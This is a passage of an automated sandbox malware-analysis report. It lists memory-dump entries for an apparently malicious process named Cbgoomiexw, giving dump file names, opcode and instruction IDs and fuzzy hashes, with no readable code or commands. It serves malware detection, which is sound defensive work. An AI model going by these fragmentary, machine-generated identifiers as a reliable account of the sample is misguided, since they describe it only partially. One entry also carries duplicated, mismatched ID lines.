                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !
                                          • API String ID: 0-2657877971
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86d3f3212ba7f9a1e5e2d60aa5ee8ace6d2ca2e7b29d5fd9efa5300a88584935
                                          • Instruction ID: a32b6b71e9f10d4967ef1e1e3425575a6f6afa30282ee6f2b615d84886771b8e
                                          • Opcode Fuzzy Hash: 86d3f3212ba7f9a1e5e2d60aa5ee8ace6d2ca2e7b29d5fd9efa5300a88584935
                                          • Instruction Fuzzy Hash: D0A18034E0062ACFDF91DFA5D840AEEBBB1BF48300F148116E815A7399D738994ADF91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8050983562ecb8ec31bd4d83142ad99d68d7ce013d39a96bad472fe2bbf330cb
                                          • Instruction ID: 9ff04017d1c36bb533bec378855b2ec857ba5e20a4f7f2968957d8eaaa024bfe
                                          • Opcode Fuzzy Hash: 8050983562ecb8ec31bd4d83142ad99d68d7ce013d39a96bad472fe2bbf330cb
                                          • Instruction Fuzzy Hash: 4981AE35B012248FCB15DFA4E954AADBBF2EF88311F14406AE912EB391CB35DD85CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d254f6545021105831849745958d2659d851f8c0c47afbbaef1d28e19f93f191
                                          • Instruction ID: b534dfda5c35221d7993bbbe9674fb6d6bcfd335951e16eae5bb508d8311e603
                                          • Opcode Fuzzy Hash: d254f6545021105831849745958d2659d851f8c0c47afbbaef1d28e19f93f191
                                          • Instruction Fuzzy Hash: EE611474E10218DFEB49DFE9D894AEEBBB2FB88341F10402AE516A7395D7305945CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48929af8dd311d1aaa5716d65e5cbaa33df0b053dd558eab40934c2564182bd6
                                          • Instruction ID: e98511687ce06ca8a1f27bd857c9a635e342aab7f120c59b6b0a89a377c46d45
                                          • Opcode Fuzzy Hash: 48929af8dd311d1aaa5716d65e5cbaa33df0b053dd558eab40934c2564182bd6
                                          • Instruction Fuzzy Hash: 57519074E05228CFEBA8CF68DC94BA9B7B1BB89301F0485A9D50DA7355DB706E84CF50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 176a767cb55037f6f76cf7d32e04bdde11c45ed22b20211a000a0b9a9bcbc8ac
                                          • Instruction ID: 41ef5e9c8e80373c21c5062edd2e1de2e5684b34df1601b73dfe3c286654d3c4
                                          • Opcode Fuzzy Hash: 176a767cb55037f6f76cf7d32e04bdde11c45ed22b20211a000a0b9a9bcbc8ac
                                          • Instruction Fuzzy Hash: 1A419070E05228CFEBA8CFA8CC94BADB7B5AB88301F0485A9D50DA7351DB305E848F51
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71f025953a80d7fe4844532dcb1cc9f298c5ec13d0f7837d012bd93b7b2645b1
                                          • Instruction ID: af8e8c0e3eb371abd2c9b5947db54b9dd00130005a15574ccfaf6da89d4f926c
                                          • Opcode Fuzzy Hash: 71f025953a80d7fe4844532dcb1cc9f298c5ec13d0f7837d012bd93b7b2645b1
                                          • Instruction Fuzzy Hash: 2131E636A10104DFDB59DF58D888E99BBB2FF49320B1640B8E9099B372C731ED55DB80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0381013a3a38fecb6b8420ef16843d8c9fe4b2dd8dff9ec4d48bcd05bb3512a0
                                          • Instruction ID: a38a06e1c650d788a174216106aaf1be9b5b32c9ebc88d5073a8d73a82d0fa49
                                          • Opcode Fuzzy Hash: 0381013a3a38fecb6b8420ef16843d8c9fe4b2dd8dff9ec4d48bcd05bb3512a0
                                          • Instruction Fuzzy Hash: 5A41AB34A002258FDB50CFA5C944ABEFBB1FF88345F00842AD50AE7290E734E949CBD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdf749516ead29770e7d793192990a351e06f3ea2d122696244b256dfa249d98
                                          • Instruction ID: 737897ee2a1b8761e2f9a7f95d74d35743bfb494552611a3b6e951d8ddf66e45
                                          • Opcode Fuzzy Hash: fdf749516ead29770e7d793192990a351e06f3ea2d122696244b256dfa249d98
                                          • Instruction Fuzzy Hash: 5A41AF70E05228CFEBA8CF98DC94BEDB7B1BB88301F0485A9D509A7355DB706E848F50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 962d94729462b9f4cbe0f20ee5e22f44dc158c371ed6eefeec46a985ce384194
                                          • Instruction ID: 173737560b10ef63d92daf739a09e97ad6bbb4b66a3ac8a7e510a10a097eba3d
                                          • Opcode Fuzzy Hash: 962d94729462b9f4cbe0f20ee5e22f44dc158c371ed6eefeec46a985ce384194
                                          • Instruction Fuzzy Hash: FD31F274E05218EFEB44CFA9D945AEEBBF6AF8A300F10902AD525BB350D77459448FA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b07ffd99503d2851cd070bcf96ea0ec4f98862122622853334bc3f167be1df46
                                          • Instruction ID: 4dee56cf7c4f763310c5fdee2cc63fe7b613b03e7c16965e2e91af0a3a24df17
                                          • Opcode Fuzzy Hash: b07ffd99503d2851cd070bcf96ea0ec4f98862122622853334bc3f167be1df46
                                          • Instruction Fuzzy Hash: 6A3169B4E04209CFDB44DFAAD4806EEBBF2EB89300F10D06AD405A7348D7309A86CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b9b576e823492e7b3d07eda5239b323d23a04a2810c38c3281d2e7204903709
                                          • Instruction ID: a6e6734485f8a048781b8a07f881139383e40ae1b96e1d37285eca52434aece7
                                          • Opcode Fuzzy Hash: 7b9b576e823492e7b3d07eda5239b323d23a04a2810c38c3281d2e7204903709
                                          • Instruction Fuzzy Hash: 81317634B00214CFC755EF34D858569BBB2EF89311B1048ADE8468B365CB35DD8ACF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed8793f015de9d8e13d6d06fd9fbc701557d1229bf0e3988ee9610ab07da5316
                                          • Instruction ID: bf3c0ff07f11916e2bd5d0cf41fee81a8fc113227a8c6c4d85ea2b70a340f060
                                          • Opcode Fuzzy Hash: ed8793f015de9d8e13d6d06fd9fbc701557d1229bf0e3988ee9610ab07da5316
                                          • Instruction Fuzzy Hash: A4318A30B003148FC765AF35D85492ABBB7FF95311B10486DE9578B369DB36E88ACB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62b13e4ac26953381b1f7fae82cedce941e6e80e2d1e350e550d791bf2851023
                                          • Instruction ID: 2374666992e89555652fb03e6fddba478c8d51031aa3b9d747db761e0a451ea9
                                          • Opcode Fuzzy Hash: 62b13e4ac26953381b1f7fae82cedce941e6e80e2d1e350e550d791bf2851023
                                          • Instruction Fuzzy Hash: FF310570E05229AFDB44CFAAD8456EEBBF6FF89310F009129E414AB250D7745944CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be16e9cc329ac6988da7ad11ee045c0f9e41d176c4022e8d03342872f9b69090
                                          • Instruction ID: c1bc4587c65fcbb98404285cc7db94ab2255e6eef7367028d3b0c75f19e995c7
                                          • Opcode Fuzzy Hash: be16e9cc329ac6988da7ad11ee045c0f9e41d176c4022e8d03342872f9b69090
                                          • Instruction Fuzzy Hash: 1E313774E00208AFCB49DFA9D8916EEBFF2FF88311F10806AE555A7264DB305945CFA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b839413635c578c74ebbe88be8b6c3296244a6438aa83b9568a0f04af46a0b16
                                          • Instruction ID: 136517f1970fb0c74297d6d53bf4a1fe284cae381f91513721e1ea569fca0bf6
                                          • Opcode Fuzzy Hash: b839413635c578c74ebbe88be8b6c3296244a6438aa83b9568a0f04af46a0b16
                                          • Instruction Fuzzy Hash: CE314BB1D05229CFEBA4CF29D854BADBBF2FB48300F2091A9D009E7655DB305984CF88
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76d151c754fb3a7c39a14df778f9a025586413313eb49e432720f510469bae0b
                                          • Instruction ID: 238868945b1de2d980ad0b1f8203791cbab17af5ac2e1dc720fdc9366fd740e5
                                          • Opcode Fuzzy Hash: 76d151c754fb3a7c39a14df778f9a025586413313eb49e432720f510469bae0b
                                          • Instruction Fuzzy Hash: E0311CB4E04209CFEB44DFAAD4846AEBBF6FB88300F10D465D515A7354D7349A85CF94
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48d7287b1e8145f465cddb6790c561cb70050be1ec2cc568aa5379ac3580c0b5
                                          • Instruction ID: 91ca700ae9aa17f8721066334f0e1dddc1843876809f72d8325cc4f8342047a8
                                          • Opcode Fuzzy Hash: 48d7287b1e8145f465cddb6790c561cb70050be1ec2cc568aa5379ac3580c0b5
                                          • Instruction Fuzzy Hash: BC310374E042299FDB44CFAAC9456EEBBF2FF89300F04906AE015AB350E7744944CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0f13771fcd0d7ad326c20ce7b9977ef5c0d5012278d3b471ceb1ef91152f7eb
                                          • Instruction ID: e90c39c67fd98948af1722ba7f08356c064934b724a1008242d164cdbffa18d7
                                          • Opcode Fuzzy Hash: b0f13771fcd0d7ad326c20ce7b9977ef5c0d5012278d3b471ceb1ef91152f7eb
                                          • Instruction Fuzzy Hash: E32105306002049FC714DB69D80479EBFF6EF84301F004969E04AE7649DF71AA428BE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 412d0278637d458c1bd7ad8f9d883f73bd4c0a6b5ae57e4f0f90bb67d02b30ea
                                          • Instruction ID: 774ad939e1cb3352a1c08f2dbdd7b5f357f23ebcf3620c7900b0f14133afda83
                                          • Opcode Fuzzy Hash: 412d0278637d458c1bd7ad8f9d883f73bd4c0a6b5ae57e4f0f90bb67d02b30ea
                                          • Instruction Fuzzy Hash: 7E21A231F002258F8B508EB9EC804AEB7F6FF84661B104476E52AD7640DB31D946C7A0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d11ad737a58fc8ae0ee2345be86f86af1425c895263239f9b7dcee9214af4b26
                                          • Instruction ID: cd1a51fe530354e8b938d1a3ba4d637c8d7dea27f8a055f779346612b1681dc7
                                          • Opcode Fuzzy Hash: d11ad737a58fc8ae0ee2345be86f86af1425c895263239f9b7dcee9214af4b26
                                          • Instruction Fuzzy Hash: 44219F35A00218DBCB148FA9C844ADE7BF7EF8C320F145529E911A7394DB719985CBA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1879604159.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_241d000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a3ef2f5849be5e6bbfc47985d11f01b354bfb3470d57c4aeb8316668f2fedf4
                                          • Instruction ID: f247bda7d5042567d14ec4fc038b412c40be0151b066cd51878e425f95a7ac2d
                                          • Opcode Fuzzy Hash: 3a3ef2f5849be5e6bbfc47985d11f01b354bfb3470d57c4aeb8316668f2fedf4
                                          • Instruction Fuzzy Hash: 2B21D6B1904240DFDB05DF14D9C4B27BF65FB94328F24C56AE90A0A356C336D456C7A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 320d23a70709cf58a8d7f5353719f149deb634855f0226b0dab5dc5ec5ff5ebe
                                          • Instruction ID: 45222d62d9a947df22b24c5a0217dbb34bf38e4ba415facc0db1b855c3c1d133
                                          • Opcode Fuzzy Hash: 320d23a70709cf58a8d7f5353719f149deb634855f0226b0dab5dc5ec5ff5ebe
                                          • Instruction Fuzzy Hash: 75211471E00229DFEB90DFB9D844BAEBBF9EF44240F108066D559DB290E634CA55CBD1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb2951507f1b724d6d27b430a925e91c62fd535fc7172307bd4466c7f8044cc8
                                          • Instruction ID: 18d27ca3261241a783c36628a43c934182acc3555e0f332889a4cb10fc159b36
                                          • Opcode Fuzzy Hash: cb2951507f1b724d6d27b430a925e91c62fd535fc7172307bd4466c7f8044cc8
                                          • Instruction Fuzzy Hash: E911A075D0A294AFCB42DB71DD15AEBBFB8DF12200F1840A7E084DB052E2349A59CBF1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e677471173cebdd8ee30aa452f5c8f28c3b572e8a62a7116f5f2f74581c8421a
                                          • Instruction ID: 97ec9c10e7763238d02f13ad538a001d4a5c8ac600f5169413fb6e58a3a95153
                                          • Opcode Fuzzy Hash: e677471173cebdd8ee30aa452f5c8f28c3b572e8a62a7116f5f2f74581c8421a
                                          • Instruction Fuzzy Hash: 5C11D374B002149FCB608F788C05BAA7BF6AF88751F14402AE985DB280EB31C985CBE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76f517297a8a807ab01679c0fe9b302e0c9923cb59545065c4680600e1e09a72
                                          • Instruction ID: 0d9c36fa491dff14b62a6533a20fd2cf09e57742559abf561fb3efe61aca16e7
                                          • Opcode Fuzzy Hash: 76f517297a8a807ab01679c0fe9b302e0c9923cb59545065c4680600e1e09a72
                                          • Instruction Fuzzy Hash: 1D21D375A05219CFEBA4DF14CD44BE9B7FABB48304F0080E6E60DA7251D730AA85CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4136915f4f7d42ab68b83a887cef8bd8bbfdc9111daa36e7d42c7d28d90579bf
                                          • Instruction ID: 506f1ded8114307053aa1f60d42250a14a5b81d355f8ba0d017ce8972a9f6bd2
                                          • Opcode Fuzzy Hash: 4136915f4f7d42ab68b83a887cef8bd8bbfdc9111daa36e7d42c7d28d90579bf
                                          • Instruction Fuzzy Hash: 5B21C071A05229DFEBA4DF25CD40BE9B7F9BB49314F0080E6E609A7241D730AA84CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1879604159.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_241d000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                          • Instruction ID: bb96df18ce383b61f71e89f4bd7aba16673be7ccdd3a5c82b1d05ace210adef5
                                          • Opcode ID: 028ea0c62bf6c0454cac1102a62f3927f28eaaf1bb10e6b29de669aba111ef0e
                                          • Instruction ID: 3391c34c9b10b4dc1635b82f320f72dc29b8d242993a99725261c32fb8d22ad3
                                          • Opcode Fuzzy Hash: 028ea0c62bf6c0454cac1102a62f3927f28eaaf1bb10e6b29de669aba111ef0e
                                          • Instruction Fuzzy Hash: 22E0926580A248DEC752EFF48A112997FF09F06204F0544DFC089D7112DA395A19DBA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fd0c38a06ce7878cc937f24669ea0982928b181ca410832af1f0a8a2e8c934e
                                          • Instruction ID: 5436e423a841c2c0b02a81082c072c39e22cffd11a2aad631b92f690fad9bf2a
                                          • Opcode Fuzzy Hash: 2fd0c38a06ce7878cc937f24669ea0982928b181ca410832af1f0a8a2e8c934e
                                          • Instruction Fuzzy Hash: E2F09B3060A388AFC702DF75AD1166D7FB6DF46201F1445DFE485D7146D5315F04A7A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf1285f861b8c589d31033b208b085ae8944c2a71291f9a04a6c98f22bc6361e
                                          • Instruction ID: 98aa9d74fee41ad5c74173e09eb7a96d80dd96d3f3fccb88b28b6809147b444d
                                          • Opcode Fuzzy Hash: bf1285f861b8c589d31033b208b085ae8944c2a71291f9a04a6c98f22bc6361e
                                          • Instruction Fuzzy Hash: 7FF06D35E04618AFCB09CBA8D0487DDBFF7EB84221F1480A9E00AD3284EB705AC5CBC4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec16fa5c2724b7e53a651593c4334e47c0c8dfa01e33ba5c20c69da68b2a3c12
                                          • Instruction ID: 5ddb798e923aaa0b05d5dbf2458be0c79773581efd61439d5a438f9ff3eeb17c
                                          • Opcode Fuzzy Hash: ec16fa5c2724b7e53a651593c4334e47c0c8dfa01e33ba5c20c69da68b2a3c12
                                          • Instruction Fuzzy Hash: 57F0CF74E00228EFEB90DF58E88579DBBB2FB4A310F104499E149A7355CB349D89CF55
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e007a2f51d136499e17faed490d275b85612a6d9bae1a139da8db4ec89487110
                                          • Instruction ID: 22f65339cb305e27fc080bb1d1d1a64316a15aed15677f0e6d3e5466a3ab56ec
                                          • Opcode Fuzzy Hash: e007a2f51d136499e17faed490d275b85612a6d9bae1a139da8db4ec89487110
                                          • Instruction Fuzzy Hash: ABF0303450A3899FCB12DF75A90068DBFF5DF46610B1404DFD488D7246E9311E889751
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee1d45c0e9e015f6d9076a3842b79596d79828186517e470c9c90e4e6f9a05d2
                                          • Instruction ID: d8e305fd47125b880ab02142d9b8f8a23a33daaf0ed2088fab2859145e6f09f1
                                          • Opcode Fuzzy Hash: ee1d45c0e9e015f6d9076a3842b79596d79828186517e470c9c90e4e6f9a05d2
                                          • Instruction Fuzzy Hash: 6BF03934909245DFC745DFB0D9410ACBBB0AF46310F24849AC89997361C6319E8ADF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53b5e48dc7fa953bd39546e894b90088b7d0e5a91e7bebbd0e5968385a36a7b1
                                          • Instruction ID: bd3270fc41f4fe83a6e8ff9ba69b06d32d852943d308c3ac1f405050145dcc33
                                          • Opcode Fuzzy Hash: 53b5e48dc7fa953bd39546e894b90088b7d0e5a91e7bebbd0e5968385a36a7b1
                                          • Instruction Fuzzy Hash: 2BF03074D04248EFCB44DFA9C440AADBBF8EF49310F14C09AEC6897341C6359A51DF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6fe42b697ecadd41fb7a700c42e909a408e094db0bf05be60eb53b78b1f96127
                                          • Instruction ID: e523cd1d0aa06736eea3bb18b3e08a4b25fdd813a5263bcae5fa2b93ac85c12e
                                          • Opcode Fuzzy Hash: 6fe42b697ecadd41fb7a700c42e909a408e094db0bf05be60eb53b78b1f96127
                                          • Instruction Fuzzy Hash: 5DE0DF30C0F244DFCB068FB094401ACBFB5AB46310F2882EFE40457252D67A4E58DB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 888a369df4adc6157b2f1eaa46f1b4613eea0cd9fd71c3c7b26d813b670a7d5d
                                          • Instruction ID: 9d0ad551d36a1aa6b6f350f65127a93ace78a426ec8be977be8d07a2e7ef779b
                                          • Opcode Fuzzy Hash: 888a369df4adc6157b2f1eaa46f1b4613eea0cd9fd71c3c7b26d813b670a7d5d
                                          • Instruction Fuzzy Hash: 33E09AB5C0A348EFD781DFB899652AC7FF0AB0E201F2040AAC408E7755E6301B94CB61
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
